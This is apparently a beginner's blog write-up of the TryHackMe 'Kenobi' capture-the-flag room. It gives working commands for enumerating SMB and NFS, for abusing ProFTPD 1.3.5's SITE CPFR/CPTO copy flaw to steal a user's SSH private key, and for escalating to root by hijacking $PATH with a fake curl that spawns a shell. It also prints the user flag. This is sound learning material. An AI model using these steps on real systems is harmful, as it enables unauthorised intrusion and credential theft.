THM — Kenobi Writeup

Nmap, smbclient, exploitdb, ssh, $PATH

https://tryhackme.com/room/kenobi

Deploy the vulnerable machine

Nmap Scan: $nmap -T4 -A 10.10.88.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:36 EST
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 52145/tcp6 mountd
| 100005 1,2,3 52209/udp6 mountd
| 100005 1,2,3 53083/tcp mountd
| 100005 1,2,3 60946/udp mountd
| 100021 1,3,4 34275/tcp nlockmgr
| 100021 1,3,4 36852/udp nlockmgr
| 100021 1,3,4 40952/udp6 nlockmgr
| 100021 1,3,4 43819/tcp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Scan the machine with nmap, how many ports are open?

Ans: 7

Enumerating Samba for shares

Enumerating shares with nmap:

nmap -p 445 — script=smb-enum-shares.nse,smb-enum-users.nse 10.10.88.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:45 EST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 50.00% done; ETC: 01:46 (0:00:21 remaining)
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).

Using the nmap command above, how many shares have been found?

Ans: 3

Next, inspect the anonymous share using the command:

smbclient //10.10.88.100/anonymous

When asked to input a password, just hit enter without entering any password.

Input help to list out what commands to use for SMB.

kali@kali:~$ smbclient //10.10.88.100/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!

Once you’re connected, list the files on the share. What is the file can you see?

List out the files on the share using the command: $ ls

smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019

Ans: log.txt

Using the command: $ get log.txt

You can download the file to your local machine and view it.

What port is FTP running on?

Ans: 21

Next, lets enumerate port 111: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.88.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:09 EST
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).

What mount can we see?

Ans:/var

Gain initial access with ProFtpd

Using netcat to connect to the machine on the FTP port, where FTP is port 21: $ nc 10.10.88.100 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.88.100]

What is the version?

Ans: 1.3.5

Use searchsploit to search for exploits.

How many exploits are there for the ProFTPd running?

Ans:3

From the log.txt file earlier we can see that the FTP server is running as the kenobi user.

In the log.txt it is mentioned where the user’s id_rsa key is located:

“Your identification has been saved in /home/kenobi/.ssh/id_rsa”

Based on the exploit we found earlier: “File copy — 36742.txt”.

We can use the command: SITE CPFR to state the source file/directory and the command: SITE CPTO to state the destination file/directory.

This will copy the file from the source to the destination.

Here we will perform the commands to set the location of the id_rsa file:

$ site cpfr /home/kenobi/.ssh/id_rsa

Previously we enumerated port 111, and found out that we could see the /var directory.

Next, we will set the destination file using the commands:

$ site cpto /var/tmp/id_rsa

This way we have moved the id_rsa key from the /home/kenobi/ to /var/tmp/ directory.

*My THM box IP expired, the new IP address is: 10.10.93.173

kali@kali:~$ nc 10.10.93.173 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.173]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful

Next, we will need to mount the /var/tmp directory to our machine.

kali@kali:~$ sudo mkdir /mnt/kenobiNFS

We have successfully network mount the /var into our machine.

Let’s check the RSA key out.

Using the command: $ cp /mnt/kenobiNFS/tmp/id_rsa .

I am able to copy the RSA key into my current kali directory.

Remember to chmod 600 id_rsa before using the key. If not you will get prompted that the RSA key permissions are too open.

Now, with this RSA key, we can ssh into kenobi’s account using the command:

$ ssh -i id_rsa kenobi@10.10.93.173

Nice, now we have successfully ssh over to kenobi user account.

Let’s find the user flag.

kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

What is Kenobi’s user flag (/home/kenobi/user.txt)?

Ans: d0b0f3f53b6caa532a83915e19224899

Privilege Escalation with Path Variable Manipulation

With the following command we can search the system for files with SUID bits:

find / -perm -u=s -type f 2>/dev/null

What file looks particularly out of the ordinary?

Ans: /usr/bin/menu

Let’s run this binary.

Run the binary, how many options appear?

Ans: 3

Entering each choice executes some commands.

Using the command: $ strings /usr/bin/menu

We can print out human-readable strings.

After the sentence “Enter your choice: ” we can see the following commands:

curl -I localhost
uname -r
ifconfig

Basically if we run each commands, it is the same as before when we enter our choice of 1–3.

Note above that the binaries are running without a full path.

Example of full path: /usr/bin/curl

We can manipulate the path to gain a root shell.

First, we create a /bin/bash string into a file named curl.

We changed the permissions of the file curl.

We exported the /tmp directory into the $PATH environmental variable

If we take a look at the $PATH environmental variable now:

kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

So what these all means?

Previously if you echo, the /tmp directory would not be there, but we used the command$ export PATH=/tmp:$PATH and add the /tmp directory to the front of all the other directories.

Whenever we use a command for example: $ pwd, $ ls, $ cat, the Shell will look into the $PATH environmental variable which contains a list of directories paths separated by a colon (shown above).

It will look through each directory paths in the order from left to right (first it ill search in the /tmp, then the /home/kenobi/bin, then the /home/kenobi/.local/bin and so on) to find and run the binary or executable file, that has the name of the command that you input or entered in the command line.

You can use the command: $ which to show the location of the binaries or executables.

kali@kali:~$ which pwd
/usr/bin/pwd
kali@kali:~$ which ls
/usr/bin/ls
kali@kali:~$ which cat
/usr/bin/cat

So when we run $ /usr/bin/menu and enter the choice of “1” now. It will run the curl command. Remember previously we use the command: $ strings /usr/bin/menu to find out that by entering choice “1” we are executing the command: $ curl -I localhost .

Now, the shell will look into the $PATH variable to find the fake curl binary. It will first look into the /tmp directory since that is the first directory to look at. Then it will find the fake curl binary and execute it and with the /usr/bin/menu running as root, we got our shell.

For own better understanding, I run the command: $ /bin/sh on my own machine.

kali@kali:/$ /bin/sh
$ pwd
/
$ whoami
kali
$ exit

Basically, when I run it, it opens a system shell. But, the current user is still my default “kali” user.

Run the same command with sudo: $ sudo /bin/sh

kali@kali:/$ sudo /bin/sh
[sudo] password for kali:
# pwd
/
# whoami
root
# exit
kali@kali:/$

This time by running it with sudo, it will open a shell but as a root user.

The same thing as what we are going to do below. Since the /usr/bin/menu has a SUID bit, meaning it will run the command as root. Next, by entering choice “1” we are trying to run the curl command, which the shell will look into the $PATH variable and find the fake curl that we created. So essentially we are executing the /bin/sh that is found in the fake curl file as root and got the root shell.

What is the root flag (/root/root.txt)?

Ans: 177…

You can learn more about the $PATH environmental variable here.

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.